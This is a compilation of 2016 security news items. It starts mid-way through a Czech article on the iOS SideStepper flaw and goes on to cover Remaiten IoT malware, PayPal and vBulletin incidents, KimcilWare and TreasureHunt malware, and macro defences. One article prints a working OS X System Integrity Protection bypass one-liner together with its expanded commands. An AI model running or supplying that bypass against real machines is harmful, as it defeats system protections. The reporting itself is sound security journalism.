Případný útok by mohl podle něj vypadat následovně. „Nejdříve přesvědčí uživatele k instalaci škodlivého konfiguračního profilu, například prostřednictvím phishingové zprávy. Jedná se o jednoduchý a efektivní způsob útoku, který využívá pro šíření škodlivého odkazu osvědčené komunikační platformy, jako jsou SMS, chatovací programy nebo e-mail. Útočníci pak mohou napodobovat příkazy, kterým iOS věří, a instalovat vzdáleně další škodlivé aplikace,“ doplnil Řeháček.
Prostřednictvím nich pak mohou uživatele odposlouchávat, odchytávat přihlašovací údaje a další citlivá data. Stejně tak ale mohou na dálku aktivovat kameru či mikrofon, aby zachytili zvuky a obrazy.
Detaily o nové zranitelnosti byly ve čtvrtek odpoledne zveřejněny na bezpečnostní konferenci Black Hat Asia. Případní počítačoví piráti tak mají v rukou prakticky vše, co potřebují, aby mohli trhlinu zneužít.
Doposud však nebyl zaznamenán žádný případ zneužití nově objevené zranitelnosti.
Obezřetnost je namístě
I když oprava chyby SideStepper zatím chybí, uživatelé mohou vcelku jednoduše minimalizovat riziko napadení sami. Stačí neotvírat SMS zprávy a e-maily od neznámých lidí, to samé platí o zprávách na sociálních sítích a v nejrůznějších chatovacích programech. Právě těmito kanály totiž počítačoví piráti útočí nejčastěji.
Na mobilní platformu iOS se v poslední době zaměřují kyberzločinci stále častěji. Tento měsíc například bezpečnostní experti varovali před trojským koněm AceDeceiverem, který dokáže v jablečných zařízeních udělat poměrně velkou neplechu. Otevře totiž pirátům zadní vrátka do systému, čímž jim zpřístupní nejen nastavení, ale také uživatelská data.
Advanced Malware targeting Internet of the Things and Routers
31.3.2016 Virus
Anything connected to the Internet could be hacked and so is the Internet of Things (IoTs).
The market fragmentation of IoTs or Internet-connected devices is a security nightmare, due to poor security measures implemented by their vendors.
Now, the researchers at security firm ESET have discovered a piece of Malware that is targeting embedded devices such as routers, and other connected devices like gateways and wireless access points, rather than computers or smartphones.
Dubbed KTN-Remastered or KTN-RM, the malware is a combination of both Tsunami (or Kaiten) as well as Gafgyt.
Tsunami is a well-known IRC (Internet Relay Chat) bot used by miscreants for launching Distributed Denial of Service (DDoS) attacks while Gafgyt is used for Telnet scanning.
KTN-RM, which researcher dubbed 'Remaiten,' features an improved spreading mechanism by carrying downloader executable binaries for embedded platforms and other connected devices.
How Does the Linux Malware Work?
The malware first performs Telnet scanning to look for routers and smart devices. Once the connection is made, the malware tries to guess the login credentials in an effort to take over weakly-secured devices.
If it successfully logs in, the malware will issue a shell command to download bot executable files for multiple system architectures before running them on the compromised networking kit.
"This is a simple but noisy way of ensuring that the new victim gets infected because it is likely that one of the binaries is for the current platform," explained ESET Malware Researcher Michal Malík. "It targets mainly those with weak login credentials."
The malware, version 2.0, also has a welcome message for those who might try to neutralise its threat, containing a reference to the Malware Must Die blog.
Perhaps it is a way to take revenge, as Malware Must Die has published extensive details about Gafgyt, Tsunami and other members of this Malware family.
For more technical details about KTN-RM or Remaiten, you can head on to ESET's official blog post published Wednesday.
Here's the Exploit to Bypass Apple Security Feature that Fits in a Tweet
31.3.2016 Apple
Did you install the latest update OS X 10.11.4?
If yes, then you might be wondering with a fact that the Apple had delivered an ineffective patch update this time.
Yes! This news would definitely disappoint many Apple users, as the latest update of OS X El Capitan 10.11.4 and iOS 9.3 still contain a privilege escalation vulnerability that could affect 130 Million Apple customers.
Just last week, we reported about a critical privilege escalation vulnerability in Apple's popular System Integrity Protection (SIP) security mechanism, affecting all versions of OS X operating system.
Even after Apple had fixed the critical flaw in the latest round of patches for Macs and iThings, the SIP can still be bypassed in the most recent version of operating system, leaving Apple users vulnerable to flaws that could remotely hijack their machines.
SIP Bypass Exploit Code Fits in a Tweet
Interestingly, Stefan Esser, a security researcher from Germany, has released a new exploit code to bypass latest patched version of SIP application, which just fits in a Tweet.
Here's the exploit code -- It can be used to modify a crucial OS X configuration file that not even root user is allowed to touch, reported The Register.
ln -s /S*/*/E*/A*Li*/*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li*/Ex*/;reboot
The above code actually expands to:
ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX
fsck_cs /dev/diskX 1>&-
touch /Library/Extensions/
Reboot
The above exploit code successfully bypasses Apple's SIP technology, allowing one to run processes as it is pleased.
What is System Integrity Protection (SIP)?
Apple introduced SIP, a security protection feature to the OS X kernel, with the release of OS X El Capitan, which is designed to restrict the root account of OS X machines and limit the actions a root user can perform on protected parts of the system.
Besides this, System Integrity Protection (SIP) also helps prevent software from changing your startup volume, blocks certain kernel extensions from being loaded and limits the debugging of certain apps.
System Integrity Protection or SIP, by default, protects these folders: /System, /usr, /bin, /sbin, along with applications that come pre-installed with OS X.
This is really a bad time for Apple and its users. Now, let's hope that the company would be more vigilant with its upcoming patch update.
The Linux Remaiten malware is building a Botnet of IoT devices
31.3.2016 Virus
Experts from the ESET firm have spotted a new threat in the wild dubbed Remaiten that targets embedded systems to recruit them in a botnet.
ESET is actively monitoring malicious codes that target IoT systems such as routers, gateways and wireless access points, rather than computers or smartphones.
Security researchers from ESET have discovered a new threat dubbed KTN-RM or Remaiten that targets Internet of Things devices by combining the capabilities of Linux malware known as Tsunami and Gafgyt.
Tsunami is a downloader/IRC Bot backdoor used in the criminal ecosystem to launch DDoS attacks, meanwhile Linux/Gafgyt serves as a backdoor that could be controlled remotely and used as a Telnet scanning.
“Recently, we discovered a bot that combines the capabilities ofTsunami (also known as Kaiten) and Gafgyt. It also provides some improvements as well as a couple of new features. We call this new threat Linux/Remaiten. So far, we have seen three versions ofLinux/Remaiten that identify themselves as versions 2.0, 2.1 and 2.2. Based on artifacts found in the code, the authors call this new malware “KTN-Remastered” or “KTN-RM”.” states the official blog post published by the company.
The KTN-RM malware (aka Remaiten) implements an effective ,’ features an improved spreading mechanism by carrying downloader executable binaries for embedded platforms and other connected devices.
The attack scenario is similar to the one seen in the wild for other IoT threats, the Remaiten malware scan the Internet searching IoT devices that accept Telnet connections, then it tries to connect them by using a dictionary of login credentials. If the malware successfully login the device, it establishes a shell command to download other malicious binaries on the infected system.
The Linux Remaiten downloaders are small ELF executables embedded in the bot binary itself that are executed on the target devices to instruct it in connecting the bot’s C&C server. The researchers at ESET discovered that bot binaries include a hardcoded list of C&C server IP addresses, the bot also sends to the control server information on the infected device (i.e. IP address, login credentials, infection status).
“When instructed to perform telnet scanning, it tries to connect to random IP addresses reachable from the Internet on port 23. If the connection succeeds, it will try to guess the login credentials from an embedded list of username/password combinations. If it successfully logs in, it issues a shell command to download bot executables for multiple architectures and tries to run them. This is a simple albeit noisy way of infecting new victims, as it is likely one of the binaries will execute on the running architecture.” state the post.
The researcher also revealed a curiosity on the malware, the C&C server used for version 2.0 displays a welcome message that references the MalwareMustDie blog, let’s consider it a sort of revenge of the author for the popular team of researchers.
Give a look to the report published by ESET for more technical details about the Remaiten malware.
Microsoft adds Linux Bash Shell and Ubuntu Binaries to Windows 10
31.3.2016 Safety
'Microsoft loves Linux' so much that now the company is bringing the popular Bash shell, alongside the entire Linux command environment, to its newest Windows 10 OS in the upcoming 'Anniversary Update,' Redstone.
The rumours before the Microsoft’s Build 2016 developer conference were true. Microsoft has just confirmed that it is going to enable its users to run Bash (Bourne Again Shell) natively on Windows 10.
Also Read: Microsoft Drops a Cloud Data Center Under the Ocean.
Microsoft has partnered with Ubuntu's parent company Canonical to ensure the Bash experience for users is just as good in Windows OS as it's in variants of Linux.
Although the Goal of the partnership, in the end, is to bring Ubuntu on Windows 10, don't expect it to run Ubuntu directly on Windows 10.
Users will be able to download Bash from the Windows Store. BASH or Bourne Again Shell is capable of handling advanced command line functionalities that are not a cup of tea for Powershell or CMDs.
"The Bash shell is coming to Windows. Yes, the real Bash is coming to Windows," said Microsoft's Kevin Gallo at Build 2016 keynote. "This is not a VM [Virtual Machine]. This is not cross-compiled tools. This is native."
There already exists third-party apps to implement Bash shell running on Windows, such as Cygwin or MSYS. But the new move by Microsoft would eliminate the usage of 3rd party utilities, offering, even more, flexibility for developers who prefer using these binaries and tools.
How to Run Bash on Windows?
run-bash-windows-10
Users just have to follow these simple steps to run Bash on Windows 10 OS:
Open the Windows Start menu
Type "bash"
Hit 'Enter'
This will open a command line console (cmd.exe) running Ubuntu's /bin/bash, Dustin Kirkland, Canonical's Ubuntu Product and Strategy team member, explains in a blog post.
The system features a full Ubuntu user space complete with support for tools including ssh, apt, rsync, find, grep, awk, sed, sort, xargs, md5sum, gpg, curl, wget, apache, mysql, python, perl, ruby, php, vim, emacs and more.
This is not Microsoft Linux for Windows
ubuntu-on-windows-10
Don’t get confused, as Microsoft is not enabling Linux applications to run on top of Windows nor this is "Microsoft Linux." The company is just providing support for Bash on Windows 10 as an expansion of its command-line tool family.
So, the company is working on integrating Ubuntu User Space in Windows 10, as a hacker has already spotted a Linux subsystem in preview build (build 14251) of the Windows 10 code in late January.
ubuntu-windows10-file-explorer
As Kirkland writes:
"So just Ubuntu running in a virtual machine?" Nope! This isn't a virtual machine at all. There's no Linux kernel booting in a VM under a hypervisor. It's just the Ubuntu user space. "Ah, okay, so this is Ubuntu in a container then?" Nope! This isn't a container either.
It's native Ubuntu binaries running directly in Windows. "Hum, well it's like cygwin perhaps?" Nope! Cygwin includes open source utilities are recompiled from source to run natively in Windows. Here, we're talking about bit-for-bit, checksum-for-checksum Ubuntu ELF binaries running directly in Windows.
This isn't Microsoft's first step towards implementing Linux functionality in Windows. Just last year, Microsoft had worked on the Linux Kernel and made a Linux OS called Azure Cloud Switch. It also chose Ubuntu as the operating system for its Cloud-based Big Data services.
Channel9TV
Marine Corps Cyberspace Warfare Group, the new hacker unit
31.3.2016 Safety
The United States Marine Corps has launched on March 25th a new hacker support unit named Marine Corps Cyberspace Warfare Group.
It is unnecessary to remind the importance of cyber capabilities in the current military environment. Government and military corps are investing to improve their cyber abilities and exploits the immense possibilities offered by the cyberspace as the fifth domain of warfare.
News of the day is that the United States Marine Corps has launched on March 25th a new hacker support unit, it follows the establishment of other hacking units announced last year.
It is a strategic decision in response to a rapid technological evolution of the military context, the Marine Corps Cyberspace Warfare Group (MCCYWG) is already operative and the assigned resources are expected to rapidly expand in the next year.
The newborn Marine Corps Cyberspace Warfare Group will support the US Marine Corps Forces Cyberspace (MARFORCYBER) established by the US Government in 2010.
The new Marine Corps Cyberspace Warfare Group will train and support hackers working for the US Marine Corps, its members will be involved in both offensive and defensive operations.
“The mission of MCCYWG is to man, train and equip Marine Cyberspace mission teams to perform both defensive and offensive cyber operations in support of United States Cyber Command and Marine Forces Cyberspace Command.” states the official website of US Marine Corps.
“We’ve always had the means to communicate and the means to protect that communication, but today we’re in an environment where those methods are more and more reliant on a system of transmissions, routers and networks,” said Col. Ossen J. D’Haiti, the commanding officer of MCCYWG. “So, the ability to protect that, the ability to control that and deny an adversary to interdict that, is crucial to command and control.”
The official announcement remarks that now more than ever, the Marine Corps is seeing the need for defense of its networks and communications. The Marine Corps Cyberspace Warfare Group will protect the Marine Corps infrastructure from cyber attacks, for this reason, in the announcement, it is described as a sort of virtual “firewall” against the cyber threats.
“Cyber operations as a whole are anything from ensuring your network is secure to home use like when you buy a router, set it up, set up passwords and encryptions,” said Sargent Brian Mueller, member of the unit.
“[Cyberspace operations] ensure that our systems are secure to stop hackers from getting into our systems where our personal identifiable information and everything else is stored,” added Mueller.
“While the offensive side is what can we do to hinder an enemy.”
Below the official description of the new hacker unit and its functions:
“Commander, MCCYWG organizes, trains, equips, provides administrative support, manages readiness, and recommends certification and presentation of Cyber Mission Force (CMF) Teams to U.S. Cyber Command. The MCCYWG plans and conducts full spectrum cyberspace operations as directed by COMMARFORCYBER in support of service, combatant command, joint, and coalition requirements.” states the website of the US Marine Corps.
Key MCCYWG tasks include:
Conduct personnel management to organize and assign individuals to work roles and place them in work centers to ensure operational readiness of CMF Teams
Ensure all personnel are trained in accordance with USCYBERCOM Joint Cyberspace Training and Certification Standards and equipped to perform all duties and tasks outlined in the MARFORCYBER Mission Essential Task List (METL)
Plan for and, when authorized, conduct OCO including computer network exploitation (CNE), cyberspace intelligence, surveillance, and reconnaissance (ISR) and operational preparation of the environment (OPE)
Plan and conduct designated DCO in response to threats against the MCEN, supported combatant command (COCOM) designated networks, and the Department of Defense Information Network (DODIN)
Advise COMMARFORCYBER on force employment considerations
Provide subject matter expertise for operational planning requirements
Enable this New Setting to Secure your Computer from Macro-based Malware
31.3.2016 Virus
Do you deal with MS Word files on the daily basis?
If yes, then are you aware that even opening a simple doc file could compromise your system?
It is a matter to think that the virus does not directly affect you, but it is you who let the virus carry out the attack by enabling deadly "Macros" to view the doc contents that are generally on eye-catching subjects like bank invoice.
How Macros are Crippling your System?
The concept of Macros dates back to 1990s. You must be familiar with this message: "Warning: This document contains macros."
A Macro is a series of commands and actions that help to automate some tasks. Microsoft Office programs support Macros written in Visual Basic for Applications (VBA), but they can also be used for malicious activities like installing malware.
Hackers are cleverly using this technique on the shade of social engineering by sending the malicious Macros through doc file or spreadsheet with an eye-catching subject in the mail to the corporate networks.
Once a user opens the malicious Word document, the doc file gets downloaded to its system. However, danger comes in when the user opens the file, and a popup window appears that states "Enable Editing" to view the content.
microsoft-office-macro-protected-view
Once the users click Enable Editing, the malicious file then begins to perform the notorious activities in the system such as to get embedded into other doc files to proliferate the attacking rate that results in crippling your system network.
All those actions would depend upon payload program defines inside the Macro.
Dridex and Locky are Warning Bells!!!
No other incidents could get you the clear picture on the potential threat of Macro viruses apart from Dridex Malware and Locky Ransomware. Both malware had made use of the malicious Macros to hijack systems.
Over 20 Million Euro had been stolen from the UK banks with the Dridex Malware, which got triggered via a nasty macro virus. The infectious bar of Locky ransomware had also seen an exponential growth in a couple of hours.
How to Protect Yourself from Macro-based Malware?
Step 1: Configure Trusted Location
Block-Macros-Office
Since disabling Macros is not a feasible option, especially in an office environment where Macros are designed to simplify the complex task with automation.
So, if your organization relies on Macros, you can move files that use Macros into the company’s DMZ (Demilitarized Zone), also called Trusted Location.
To configure the trusted location, you can navigate via:
User Configuration/Administrative Templates/Microsoft Office XXX 20XX/Application Settings/Security/Trust Center/Trusted Locations
Once configured, the Macros that does not belong to the trusted location would not run in any way, beefing up your system’s security.
Step 2: Block Macros in Office Files that came from the Internet
microsoft-office-macro-security
Microsoft had recently unveiled a novel method by implementing a new tactical security feature to limit the Macro execution attack in MS Office 2016, ultimately preventing your system from hijacking.
The new feature is a group policy setting that lets enterprise administrators to disable macros from running in Office files that come from the Internet.
The new setting is called, "Block macros from running in Office files from the Internet" and can be navigated through the group policy management editor under:
User configuration > Administrative templates > Microsoft Word 2016 > Word Options > Security > Trust Center
It can be configured for each Office application.
By enabling this option, macros that come from the Internet are blocked from running even if you have 'enable all macros' in the Macros Settings.
Moreover, instead of having the option to 'Enable Editing,' you'll receive a notification that macros are blocked from running, as the document comes from an Untrusted Source.
The only way to run that particular Office file is to save it to a trusted location, allowing macros to run.
PayPal flaw allowed hackers to send malicious emails
31.3.2016 Virus
PayPal has just fixed a security vulnerability that could have been exploited to send malicious emails to users via its platform.
Researchers at security firm Vulnerability Lab have discovered a filter bypass and an application-side input validation vulnerability that allowed attackers to inject malicious code into emails sent by the PayPal platform.
“A persistent input validation & mail encoding web vulnerability has been discovered in the official PayPal Inc online-service web-application. The validation and mail encoding web vulnerability allows remote attackers to inject own malicious script codes to the mail header of the portal mails. ” states the post published by the Vulnerability Lab.
When PayPal users create a new account, they can link it to multiple email addresses. Each email address has to be confirmed by the users by providing a confirmation code sent to the account they want to confirm.
hack-paypal
Unfortunately, an attacker could create an account and insert arbitrary HTML code in the account owner field.
The attack scenario is simple, the attacker links the new account to the victim’s email and insert a malicious code in the account owner name. The platform then sends the a confirmation email to that address of the victims, the message includes the malicious code that would get executed when the victims open the email.
The attack could be very insidious because the emails are sent from the legitimate PayPal platform through the account service[@]paypal.com, for this reason, the email is not detected as spam or malicious by the defense systems.
The above attack scenario could be exploited in phishing campaigns, session hijacking, and to redirect users to certain domains managed by the attackers.
Below a proof-of-concept video published by the experts at the Vulnerability Lab.
Vulnerability Lab reported the issue to PayPal in October 2015, the vulnerability has been fixed this month. The company awarded the researcher Kunz Mejri from Vulnerability Lab with $1,000.
The details of the flaw, for which Kunz Mejri received $1,000, were disclosed on Wednesday.
The KimcilWare Ransomware targets Magento Platforms
31.3.2016 Virus
Security experts from the MalwareHunterTeam have discovered KimcilWare ransomware, a malware specifically designed to target Magento e-commerce platforms.
Security experts from the MalwareHunterTeam have spotted a news train of ransomware, called KimcilWare, specifically designed to target Web servers, and more specifically Magento e-commerce platforms.
“A new ransomware called KimcilWare has been discovered that appears to be targeting web sites using the Magento eCommerce solution. It is currently unknown how these sites are being compromised, but victims will have their web site files encrypted using a Rijndael block cipher and then ransomed for anywhere between $140 USD and $415 USD depending on the variant that infected them. Unfortunately, at this time there is no way to decrypt the data for free.” states a blog post published on BleepingComputer.
The KimcilWare ransomware encrypts the files of the Magento platform, it is easy to recognize because it appends the “.kimcilware” extension at the end of each file. rendering the store useless.
“One script will encrypt all data on the web site and append the .kimcilware extension to all encrypted files. It will also insert a index.html file that displays the ransom note shown above. The KimcilWare variant has a ransom amount of $140 USD. You can see an example of a folder encrypted with the KimcilWare script below. ” continues BleepingComputer.
Source BleepingComputer
The malware also uses its index file in order to publish a black page that informs the victims that the server had been encrypted.
“Webserver Encrypted” states the message on the home page “Your webserver files has been encrypted with a unix algorithm encryptor. You must paw 140$ to decrypt your webserver files. Payment via Bitcoin only. For more information contact me at tuyuljahat@hotmail.com.”
Of course, the e-commerce becomes useless once the malware has encrypted all the files.
The bad news is that it is still unknown the infection process, but fortunately, the number of infections is still limited.
The KimcilWare ransomware was first reported on March 3 by the owner of a Magento store (version 1.9.1.0) on StackExchange. The administrator noticed that only one site on a server with multiple Magento instances was infected.
A second case was reported a few days later on Magento’s official forum, from a store owner running version 1.9.2.4. The Magento admin speculates a security issue affecting the Helios Vimeo Video Gallery extension.
Another ransomware having similar capabilities was discovered by the security researcher Jack (@Malwareforme). This second malware is called MireWare and uses the same tuyuljahat@hotmail.com email address in its ransom note included in the index page. From his analysis, MireWare is a variant of the
Jack noticed that MireWare is a variant of the Hidden Tear open source ransomware published by the Turkish security researchers Utku Sen for educational purposes.
The Hidden Tear was intentionally designed with security flaws and Bleeping Computer’s researchers Lawrence Abrams who analyzed MireWare confirmed that also this threat is currently broken due to the lack of a valid SSL certificate for its C&C server.
Experts believe that the KimcilWare ransomware is in its early stages, but that it might rapidly evolve.
If you administrate a Magento store update to the latest Magento store versions and use strong passwords for the admin accounts.
Google has also been Ordered to Unlock 9 Android Phones
30.3.2016 Apple
The legal battle between Apple and the FBI (Federal Bureau of Investigation) over a locked iPhone that belonged to one of the San Bernardino shooters may be over, but the Department of Justice (DoJ) are back in front of a judge with a similar request.
The American Civil Liberties Union (ACLU) has discovered publicly available court documents that revealed the government has asked Google’s assistance to help the Feds hack into at least nine locked Android smartphones citing the All Writs Act.
Yes, Apple is not the only company facing government requests over privacy and security — Google is also in the list.
The Google court documents released by the ACLU show that many federal agencies have been using the All Writs Act – the same ancient law the DoJ was invoking in the San Bernardino case to compel Apple to help the FBI in the terrorist investigation.
Additionally, the ACLU also released 54 court cases in which the federal authorities asked Apple for assistance to help them access information from a locked iPhone. However, this is the first time it has confirmed that Google has also received such requests.
All the cases appear to be closed, and the company is believed to have complied with all of the court orders. As in the majority of cases, Google was required to reset the passwords or bypass the lock screens of Samsung, HTC phones, Kyocera and Alcatel, among a number of other unidentified Android devices.
Unlike Apple, Google Can Reset Android Devices Remotely
In 2015, the New York District Attorney revealed that Google can remotely reset Android device password, in case a court demands access to it.
In other words, unlike Apple, Google has technical abilities to reset device passcode for about 74% of Android users (~Billions) running all versions older than Android 5.0 Lollipop that does not have full disk encryption.
Google had been ordered for technical assistance by many federal agencies over several cases including:
The Department of Homeland Security (DHS) in an investigation of an alleged child pornographer in California.
The FBI in the investigation of an alleged cocaine dealer, who go by the name “Grumpy,” in New Mexico.
The Bureau of Land Management in the investigation of an alleged marijuana grow operation in Oregon
The Secret Service in an unknown court case in North Carolina.
However, Google said none of the cases required the company to write new backdoored software for the federal government.
"We carefully scrutinize subpoenas and court orders to make sure they meet both the letter and spirit of the law," a Google spokesman said in a statement. "However, we have never received an All Writs Act order like the one Apple recently fought that demands we build new tools that actively compromise our products’ security….We would strongly object to such an order."
No doubt, 1789 All Writs Act is being misused as a tool against encryption, which was never intended to allow the government to dictate software design.
TreasureHunt PoS Malware targets small retailers and banks
30.3.2016 Virus
Security experts at FireEye have spotted the activity of a criminal organization that using the custom PoS malware TreasureHunt to target small retailers.
Security experts at FireEye have spotted the activity of a criminal organization that using custom PoS malware family to target retailers. Hackers are using the PoS malware dubbed TreasureHunt or TreasureHunter to steal payment card data and sells it on criminal underground forums.
The researchers found evidence that the threat has been around since at least late 2014. TreasureHunt was first discovered by researchers at the SANS institute who noticed the malware generating mutex names to evade detection.
EMV standardThe US retailers and merchants are adopting payment solutions based on the EMV standard that relies on chip-equipped cards, and for this reason are considered more secure.
A number of factors are hampering the introduction of EMV among small organizations.; the most important is probably is the high cost of the migration that it has been estimated at 8.6 billion dollars.
Consider that the cost of a single POS system that is compatible with EMV technology can reach hundreds of dollars and major retailers like Target will have to pay tens of millions of dollars in hardware. Also, don’t underestimate the additional cost of the introduction of the technology and its test in the live environment.
On the other end, banks will have to spend tens of millions to upgrade their internal systems to manage EMV payment card transactions.
Unfortunately, many cybercriminal groups have started focusing their efforts on organizations that are slow to make the transition, such as smaller banks and retailers. TreasureHunt is one of the tools used by malicious actors in attacks aimed at such organizations.
Clearly, many organizations are more slow in adopting the new standards and crooks are trying to exploit this delay targeting retailers and banks that are slow to make the transition.
TreasureHunt enumerates the processes running on the infected systems and implement memory scraping functions to extract credit and debit card information. Stolen payment card data are sent to C&C servers through HTTP POST requests.
“In this article we examine TREASUREHUNT, POS malware that appears to have been custom-built for the operations of a particular “dump shop,” which sells stolen credit card data. TREASUREHUNT enumerates running processes, extracts payment card information from memory, and then transmits this information to a command and control server.” FireEye researcher Nart Villeneuve explained in a blog post.
TreasureHunt malware PoS
The experts at FireEye believe that criminals compromised the PoS using stolen or weak credentials, once the TreasureHunt malware infected the systems, it installs itself in the “%APPDATA%” directory and maintain persistence by creating the registry entry:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jucheck
“The malware scans all running processes and ignores processes that contain System33, SysWOW64, or \Windows\explorer.exe in their module names. It searches for payment card data and, if found, sends the data encoded back to the CnC server,” FireEye researcher Nart Villeneuve explained in a blog post.
All the TreasureHunt samples have the same compilation timestamp, October 19, 2014., but experts were able to compile a timeline activity of the PoS malware by analyzing VirusTotal submissions and C&C domain registration details.
“While the compile timestamp remains the same as the previous version, the samples were first observed on Nov. 25, 2015, and March 3, 2016. The only significant change in this version is that the malware stores encoded configuration data in the NTFS alternate data streams (ADS) of the file %USERPROFILE%\ntuser.ini. We refer to these samples as version 0.1.1” due to the presence of the following string:
TreasureHunter version 0.1.1 Alpha, created by Jolly Roger
(jollyroger@prv.name) for BearsInc. Greets to Xylitol and co.”
“Jolly Roger” seems to be the author of the malware, likely a member of a hacker crew called “BearsInc” which has been offering stolen payment card data on black markets.
With an increasing number of major firms moving to EMV solution, security researchers expect to see criminals organizations increasingly targeting smaller retailers and banks that are still waiting to adopt the secure technology.
Following revelations on Paris attacks, US lawmakers target burner phones
30.3.2016 Mobil
Paris terrorists used burner phones and US lawmakers have proposed a bill that would force retailers to record the identity of the buyers of these devices.
Law enforcement and intelligence agencies worldwide are fighting against terrorist organizations operating in their territories, but investigations are hampered by the use of encrypted communications. After the Paris attacks, intelligence agencies made many speculations about possible communication channels adopted by the terrorists, including the use of the PS4 messaging system.
New revelations seem to exclude the above hypothesis, terrorists behind the Paris attacks used burner phones and not encryption to avoid being tracked.
“But the three teams in Paris were comparatively disciplined. They used only new phones that they would then discard, including several activated minutes before the attacks, or phones seized from their victims.” reported The New York Times.
The NYT cites a 55-page report compiled by the French antiterrorism police for France’s Interior Ministry and explains how the terrorists have used phones activated less than an hour before the attacks.
“Everywhere they went, the attackers left behind their throwaway phones,” states the post. “New phones linked to the assailants at the stadium and the restaurant also showed calls to Belgium in the hours and minutes before the attacks, suggesting a rear base manned by a web of still unidentified accomplices.” “Security camera footage showed Bilal Hadfi, the youngest of the assailants, as he paced outside the stadium, talking on a cellphone. The phone was activated less than an hour before he detonated his vest.”
Outside the Bataclan theater venue, the investigators found a Samsung smartphone in a dustbin with a Belgian SIM card used exclusively for the operation.
“It had a Belgian SIM card that had been in use only since the day before the attack. The phone had called just one other number—belonging to an unidentified user in Belgium.”
The police have found several unused burner phones “still in their wrappers” in a place used by the group of terrorists.
Burner Phones are an effective and secure method of communication used by criminals and terrorists. Prepaid phones are very cheap, using different mobile devices and different mobile phone numbers each time it is possible to evade monitoring activities operated by the intelligence agencies.
Soon something can change, at least in the US where lawmakers in California have proposed a new bill that would force retailers to verify and record the identity of the buyers of prepaid burner phones or similar mobile devices, as well as SIM cards.
The proposal was introduced by the Rep. Jackie Speier of California, the politic named it HR 4886, or “Closing the Pre-Paid Mobile Device Security Gap Act of 2016,” which will force require retailers to identify the purchaser of burner phones and SIM cards.
“A BILL To require purchasers of pre-paid mobile devices or SIM cards to provide identification, and for other purposes.” states the text that requests an authorized reseller to require the following information to the purchaser:
The full name of the purchaser.
The complete home address of the purchaser.
The date of birth of the purchaser.
An authorized reseller making a sale to a buyer not in person shall verify the purchaser information provided under section 2 by requiring the purchaser to submit the following information:
Valid credit or debit card account information.
Social Security number.
Driver’s license number.
Any other personal identifying information that the Attorney General finds, by regulation, to be necessary for purposes of this section.
The congresswomen explained that the bill will not eliminate the existence of burner phones, it is a necessary measure to prevent terror plots and many other illegal activities.
Speier Burner Phones
“This bill would close one of the most significant gaps in our ability to track and prevent acts of terror, drug trafficking, and modern-day slavery,” Speier said in a Wednesday blog post. The ‘burner phone’ loophole is [a glaring gap] in our legal framework that allows actors like 9/11 hijackers and the Times Square bomber to evade law enforcement while they plot to take innocent lives. The Paris attackers also used ‘burner phones.’ As we’ve seen so vividly over the past few days, we cannot afford to take these kinds of risks. It’s time to close this ‘burner phone’ loophole for good.”
There are some aspects that the Bill still doesn’t approach correctly, for example, what happen if a criminal uses a stolen identity?
In the SEC. 3. IDENTIFICATION VERIFICATION, under the “Other Sales” section it is contemplated the possibility of selling to people not in person opening the door to fraudulent purchases.
Let’s wait for the Congress opinion on the proposal.
vBulletin resets passwords after a targeted attack
30.3.2016 Incindent
vBulletin has suffered a severe attack last week that breached one of the Germany servers, in response it informed users that all passwords had been reset.
vBulletin has suffered a severe attack last week, in response it informed users that all passwords had been reset. According to the vBulletin developer Paul Marsden one of the Germany servers was breached by an unauthorized party.
“Due to the discovery yesterday of unauthorized access to of one of the VBG servers it is possible the hacker may have gained access to other vb systems as well. Therefore we have again taken the precaution of resetting all user password hashes. To be able to login to the site you will need to use the lost password functionality.
http://www.vbulletin.org/forum/login.php?do=lostpw
We apologise for any inconvenience this may cause.” said Marsden.
The attackers have breached the Germany (VBG – “vbulletin-germany.com”) server, a circumstance that could have allowed them to access other systems of the organization, including “vBulletin.com” and “vBulletin.org.”
At the time I was writing there aren’t other details on the data breach, Marsden highlighted that hackers haven’t used any exploits, a claim supported by the fact that the hackers server doesn’t run any instance of the popular CMS.
Mardden believes attackers have carefully planned the attack:
“I can tell you it wasnt via any vB exploit – in fact, the VBG site doesnt run vbulletin. Someone clearly targetted the site, it was obvious they had planned this quite carefully.”said Marsden.
This isn’t the first time that the platform is targeted by hackers, in November 2015, the official forum was shut down after a hacker using the online moniker “Coldzer0” defaced it.
The website has been defaced and the forum was displaying the message “Hacked by Coldzer0.”
According to DataBreaches.net, vBulletin, Foxit Software forums have been hacked by Coldzer0 that stole hundreds of thousands of users’ records.
The hacker published screenshots that show he managed to upload a shell to the forum website and accessed user personal information, including user IDs, names, email addresses, security questions and answers, and password salts).
As usual, I strongly suggest users to change the passwords on any other website where they shared the same login credentials.
How to Disable Windows 10 Upgrade (Forever) With Just One Click
30.3.2016 OS
If you are a Windows 7 or Windows 8.1 user, who don't want to upgrade to Windows 10 now or anytime soon, you might be sick of Microsoft constantly pestering you to upgrade your OS.
Aren't you?
With its goal to deploy Windows 10 on over 1 Billion devices worldwide, Microsoft is becoming more aggressive to convince Windows 7 and 8.1 users to upgrade to its newest operating system, and it is getting harder for users to prevent the OS being installed.
But if you're worried that this out of control Windows 10 upgrade process will force you into downloading an unwanted OS; I have an easier solution to block Windows 10 upgrade on your PCs.
A new free tool, dubbed Never10, provides the user a one-click solution to disable Windows 10 upgrade until the user explicitly gives permission to install Windows 10.
Never10 has been developed by Steve Gibson, the well-known software developer and founder of Gibson Research, which is why the tool is also known as "Gibson's Never10."
How to Disable Windows 10 Upgrade on Your PCs
Go to Gibson's Never10 official site and click on the Download.
Once downloaded, the program detects if the upgrade to Windows 10 is enabled or disabled on your system and then shows a pop-up. If enabled, Click 'Disable Win10 Upgrade' button.
You’ll again see a pop-up that now shows Windows 10 upgrade is disabled on your system, with two buttons to 'Enable Win10 Upgrade' and 'Exit.' Click on Exit button.
disable-windows10-upgrade
That's it, and you have successfully disabled Windows 10 Upgrade on your PC.
Here's the kicker:
The best part of this tool is that you don't have to install an application on your PC to do this. Gibson’s Never 10 is an executable. So you just need to run it, and it doesn’t install anything on your computer. You can delete it when you're done.
"The elegance of this 'Never 10' utility is that it does not install ANY software of its own. It simply and quickly performs the required system editing for its user," Gibson writes on his page about the new utility.
According to Gibson, Never10 will be a great help to inexperienced users while advanced users will likely appreciate the fact that no additional software is installed and will be able to refer their family and friends to this easy-to-use utility.
For more technical details on how this tool works, you can head on to this link.
